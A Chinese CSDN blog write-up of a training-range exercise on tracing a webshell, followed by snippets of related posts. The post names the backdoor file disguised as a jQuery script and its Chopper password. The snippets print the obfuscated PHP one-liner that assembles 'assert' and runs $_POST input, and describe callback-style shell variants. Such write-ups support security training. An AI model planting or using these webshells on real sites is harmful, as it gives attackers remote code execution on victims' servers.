360众测靶场题库之39-WebShell代码分析溯源(第3题)

已于 2024-03-08 18:22:59 修改
阅读量139 收藏
点赞数 2
分类专栏: 360众测靶场题库 文章标签: 安全
于 2024-03-08 18:22:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjl12344/article/details/136569271
版权

首先打开本题的网址,然后发现可以下载网站源码

下载源码用seay源码变审计系统,找到网站存在两个漏洞,如下如所示

发现一个后门漏洞,菜刀链接

http://219.153.49.228:48500/www/js/jquery1.42.min.php  密码get   即可获取key

BugBounty
关注
专栏目录
墨者学院-WebShell代码分析溯源(第3)
JimWu的博客
09-04 401
WebShell代码分析溯源(第3) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、记事本、菜刀 1.访问网页,下载网页源代码。 2.审查后,能发现js文件夹里有个与众不同的文件,就是jquery1.42.min.php。 3.打开该文件,发现果然是变种一句话木马。 $g[1]=s chr('116')调用ASCII表,查找该表,知道116对应的是t 所以拼接起来就是$g...
墨者学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 794
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   <?php...
墨者 - WebShell代码分析溯源(第3)
吃肉唐僧的博客
07-12 204
下载文件,查看到有木马文件 这个是木马的变种 <?php error_reporting(0); $g = array('','s'); $gg = a.$g[1].ser.chr('116'); @$gg($_POST[get]); ?> error_reporting(0);返回0报错提高代码的隐蔽性 然后翻译过开是 assert($_POST...
【墨者学院】WebShell文件上传漏洞分析溯源(第3)
m0_66835614的博客
11-28 912
【墨者学院】WebShell文件上传漏洞分析溯源(第3)
360众测靶场题库之35-WebShell代码分析溯源(第6)
zjl12344的博客
03-08 192
360众测靶场
360众测靶场题库之42-WebShell代码分析溯源(第9)
zjl12344的博客
03-08 253
360众测靶场题库
360众测靶场题库之37-WebShell代码分析溯源(第5)
zjl12344的博客
03-08 217
360众测靶场题库
360众测靶场题库之36-WebShell代码分析溯源(第7)
zjl12344的博客
03-08 166
360众测靶场题库
360众测靶场题库之38-WebShell代码分析溯源(第4)
zjl12344的博客
03-08 223
360众测靶场题库
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 833
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
墨者学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 705
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
墨者学院 - WebShell代码分析溯源(第11)
多崎巡礼的博客
08-06 731
&lt;?php  if(!empty($_GET[1]) &amp;&amp; $_GET[1]=='GET.fPZ87'){                     //若get到的1不为空且1=GET.fPZ87的话执行下面操作     $_=@fopen('t.php', 'a');                                                      ...
【网络安全 | JAVA代码审计】基础安全和解决方法初探
等风来
10-02 685
无占位符的预处理,其实质仍然是通过字符串拼接的方式来构造SQL语句,SQL注入依然存在,这是开发中需要谨记的。
【超强组合】基于淘金优化算法GRO-BP-Adaboost的数据分类预测算法Matlab实现.rar
最新发布
10-08
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
VMware Workstation Pro 和 VMware Fusion 安装与配置指南
10-08
内容概要:本文档详细指导了如何在不同的主机环境下,通过 VMWare 的两款产品——Workstation Pro 和 Fusion 进行新虚拟机的构建流程以及具体的操作要点说明。 适用人群:希望在单一机器上部署多操作系统的工作环境或学习测试场景的技术人员和学生。 使用场景及目标:旨在帮助初学者搭建属于自己的虚拟机实验平台,从而方便进行软件测试或者研究操作系统相关的新特性等任务,同时也有利于团队间的协作和资源调配。 注意事项:文中涉及的具体操作如下载源文件、配置网络参数时要注意版权合法性问和技术安全防范。此外还需依据各自电脑的软硬件条件适当增减虚拟机的资源设定。
科研经费管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS).zip
10-08
科研经费管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS) 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
使用Python Matplotlib进行图形输出与保存详解(包含详细的完整的程序和数据)
10-08
内容概要:本文详细介绍了使用 Python 的 Matplotlib 库来输出和保存图形的方法。不仅涉及了基本流程,如生成图表并将之导出成PNG、PDF和SVG等不同格式的内容,还包括高级话如设置透明度、分辨率以及制作包含图形元素的HTML页面等。文章通过一个具体的示例代码讲解了各个环节的关键细节和技术要点。 适用人群:对数据可视化有兴趣的初学者及具有一定基础想要深入学习 Matplotlib 使用技巧的技术人员。 使用场景及目标:适用于需要掌握 Matplotlib 不同输出选项及其特点的应用场合,尤其是当需要生成用于打印或网页展示的高质量、可自定义外观的图形时。
基于文本向量的PHP-webshell检测:XGBoost与TF-IDF算法提升准确性
动态检测通过监测代码执行过程中的敏感行为,如流量变化和系统指令,但其缺点包括高部署难度、资源占用大和检测周期长,不适用于大规模批量检测,还可能影响Web系统的性能。 传统的静态检测方法主要依赖于正则...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值